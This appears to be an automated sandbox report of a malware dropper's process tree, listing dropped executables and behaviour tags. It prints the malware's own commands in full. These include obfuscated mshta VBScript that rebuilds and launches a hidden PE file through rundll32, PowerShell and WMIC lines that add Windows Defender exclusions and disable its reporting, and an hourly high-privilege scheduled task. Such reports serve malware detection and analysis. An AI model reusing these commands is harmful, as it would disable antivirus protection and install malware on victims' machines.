cmd.exe PID 4740 wrote to memory of 4376 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 4376 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3528 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3528 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3528 4740 setup_install.exe cmd.exe PID 2816 wrote to memory of 784 2816 cmd.exe Wed151f5e3fd2.exe PID 2816 wrote to memory of 784 2816 cmd.exe Wed151f5e3fd2.exe PID 2816 wrote to memory of 784 2816 cmd.exe Wed151f5e3fd2.exe PID 4740 wrote to memory of 5040 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 5040 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 5040 4740 setup_install.exe cmd.exe PID 2128 wrote to memory of 5044 2128 cmd.exe powershell.exe PID 2128 wrote to memory of 5044 2128 cmd.exe powershell.exe PID 2128 wrote to memory of 5044 2128 cmd.exe powershell.exe PID 988 wrote to memory of 4532 988 cmd.exe Wed1529d8198a8f0c1.exe PID 988 wrote to memory of 4532 988 cmd.exe Wed1529d8198a8f0c1.exe PID 988 wrote to memory of 4532 988 cmd.exe Wed1529d8198a8f0c1.exe PID 4740 wrote to memory of 4520 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 4520 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 4520 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3200 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3200 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3200 4740 setup_install.exe cmd.exe PID 3876 wrote to memory of 1448 3876 cmd.exe Wed15228d911b9d5c.exe PID 3876 wrote to memory of 1448 3876 cmd.exe Wed15228d911b9d5c.exe PID 3876 wrote to memory of 1448 3876 cmd.exe Wed15228d911b9d5c.exe PID 4740 wrote to memory of 1184 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 1184 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 1184 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3228 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3228 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3228 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3900 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3900 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3900 4740 setup_install.exe cmd.exe PID 4520 wrote to memory of 3820 4520 cmd.exe Wed15cdfe4f1ee8.exe PID 4520 wrote to memory of 3820 4520 cmd.exe Wed15cdfe4f1ee8.exe PID 4520 wrote to memory of 3820 4520 cmd.exe Wed15cdfe4f1ee8.exe PID 4740 wrote to memory of 3552 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3552 4740 setup_install.exe cmd.exe PID 4740 wrote to memory of 3552 4740 setup_install.exe cmd.exe PID 4376 wrote to memory of 3600 4376 cmd.exe Wed154a69e494d5e99ca.exe PID 4376 wrote to memory of 3600 4376 cmd.exe Wed154a69e494d5e99ca.exe PID 3528 wrote to memory of 3488 3528 cmd.exe Wed15ac1df9305ded09.exe PID 3528 wrote to memory of 3488 3528 cmd.exe Wed15ac1df9305ded09.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed151f5e3fd2.exeWed151f5e3fd2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed1529d8198a8f0c1.exeWed1529d8198a8f0c1.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1207294.scr"C:\Users\Admin\AppData\Roaming\1207294.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2829930.scr"C:\Users\Admin\AppData\Roaming\2829930.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6215607.scr"C:\Users\Admin\AppData\Roaming\6215607.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\2595946.scr"C:\Users\Admin\AppData\Roaming\2595946.scr" /S6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:CLose ( cREAteObjecT ("wScrIPT.ShELL" ).RuN("CMD.ExE /R TYPE ""C:\Users\Admin\AppData\Roaming\2595946.scr"" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK&IF ""/S"" == """" for %Q iN ( ""C:\Users\Admin\AppData\Roaming\2595946.scr"" ) do taskkill -iM ""%~NxQ"" /F " , 0 , TRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPE "C:\Users\Admin\AppData\Roaming\2595946.scr" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK&IF "/S" == "" for %Q iN ( "C:\Users\Admin\AppData\Roaming\2595946.scr" ) do taskkill -iM "%~NxQ" /F8⤵
-
C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXES97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:CLose ( cREAteObjecT ("wScrIPT.ShELL" ).RuN("CMD.ExE /R TYPE ""C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE"" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK&IF ""/pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK"" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE"" ) do taskkill -iM ""%~NxQ"" /F " , 0 , TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPE "C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK&IF "/pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK" == "" for %Q iN ( "C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE" ) do taskkill -iM "%~NxQ" /F11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRIPt: ClOse( creaTEObJeCt ( "wScRIPt.Shell" ).RUN ( "cMD.ExE /r ECho | sEt /P = ""MZ"" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC+ eHAg4.2 + as8RZQxR.V+ B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr " , 0 , TruE) )10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r ECho | sEt /P = "MZ" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC+ eHAg4.2 + as8RZQxR.V+B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>EddJYb.9BC"12⤵
-
C:\Windows\SysWOW64\control.execontrol.exe .\d1eAS3R.Fr12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\d1eAS3R.Fr13⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\d1eAS3R.Fr14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\d1eAS3R.Fr15⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRIPt: ClOse( creaTEObJeCt ( "wScRIPt.Shell" ).RUN ( "cMD.ExE /r ECho | sEt /P = ""MZ"" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC+ eHAg4.2 + as8RZQxR.V+ B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr " , 0 , TruE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r ECho | sEt /P = "MZ" > EddJYb.9BC &cOPy /B /y EDdJYB.9BC+ eHAg4.2 + as8RZQxR.V+B4fStFA.RY7+ AZRE.U d1EAs3R.FR &stArt control.exe .\d1eAS3R.Fr8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>EddJYb.9BC"9⤵
-
C:\Windows\SysWOW64\control.execontrol.exe .\d1eAS3R.Fr9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\d1eAS3R.Fr10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\d1eAS3R.Fr11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\d1eAS3R.Fr12⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\4384150.scr"C:\Users\Admin\AppData\Roaming\4384150.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15228d911b9d5c.exeWed15228d911b9d5c.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\YRuFLQioz9k_aCvbJINamAn1.exe"C:\Users\Admin\Documents\YRuFLQioz9k_aCvbJINamAn1.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5472 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\hK6RrLn9hqeFIawsTd99yGDw.exe"C:\Users\Admin\Documents\hK6RrLn9hqeFIawsTd99yGDw.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\Installer.exe"C:\Program Files (x86)\Company\NewProduct\Installer.exe"7⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"9⤵
-
C:\Users\Admin\Documents\eRSVwarLdW_vKn04ZbdisJ63.exe"C:\Users\Admin\Documents\eRSVwarLdW_vKn04ZbdisJ63.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 2767⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\hx8zKDisWjElqWnOPvs7qHfF.exe"C:\Users\Admin\Documents\hx8zKDisWjElqWnOPvs7qHfF.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\hx8zKDisWjElqWnOPvs7qHfF.exe"C:\Users\Admin\Documents\hx8zKDisWjElqWnOPvs7qHfF.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 10487⤵
- Program crash
-
C:\Users\Admin\Documents\UW7CKXEsUQxJjyDaLLnybOuF.exe"C:\Users\Admin\Documents\UW7CKXEsUQxJjyDaLLnybOuF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\dK4GoEA4II29LNHp3L6J1CN8.exe"C:\Users\Admin\Documents\dK4GoEA4II29LNHp3L6J1CN8.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4768 -s 1527⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9kOPLAnIB3uueauOt9hpoSeF.exe"C:\Users\Admin\Documents\9kOPLAnIB3uueauOt9hpoSeF.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\RDBlgIibAm197edTZKeOiIT0.exe"C:\Users\Admin\Documents\RDBlgIibAm197edTZKeOiIT0.exe"6⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"7⤵
-
C:\Users\Admin\Documents\Otkl2w3MYaOYZNGLpudAaCMk.exe"C:\Users\Admin\Documents\Otkl2w3MYaOYZNGLpudAaCMk.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6164 -s 17329⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9IjMd5iOi77WqNnRpTgopX7E.exe"C:\Users\Admin\Documents\9IjMd5iOi77WqNnRpTgopX7E.exe" /mixtwo8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 2769⤵
- Program crash
-
C:\Users\Admin\Documents\_YUuLSEYMRszAJu88tIgP0M_.exe"C:\Users\Admin\Documents\_YUuLSEYMRszAJu88tIgP0M_.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\7Ga22DMpgGLNmIcC0zmTTu3r.exe"C:\Users\Admin\Documents\7Ga22DMpgGLNmIcC0zmTTu3r.exe"8⤵
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\7Ga22DMpgGLNmIcC0zmTTu3r.exe"C:\Users\Admin\Documents\7Ga22DMpgGLNmIcC0zmTTu3r.exe"9⤵
-
C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe"C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\XngrJAwLOuW8GKMqkR3PJpoG.exe" ) do taskkill -F -Im "%~nXU"10⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"14⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM16⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM17⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "XngrJAwLOuW8GKMqkR3PJpoG.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\KogQadZrOuL07lZssL6UBdWe.exe"C:\Users\Admin\Documents\KogQadZrOuL07lZssL6UBdWe.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp58DF_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp58DF_tmp.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmp58DF_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp58DF_tmp.exe10⤵
-
C:\Users\Admin\Documents\6YZ75aNNqHcJq3kYmreYFnOl.exe"C:\Users\Admin\Documents\6YZ75aNNqHcJq3kYmreYFnOl.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3F5C.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS6070.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
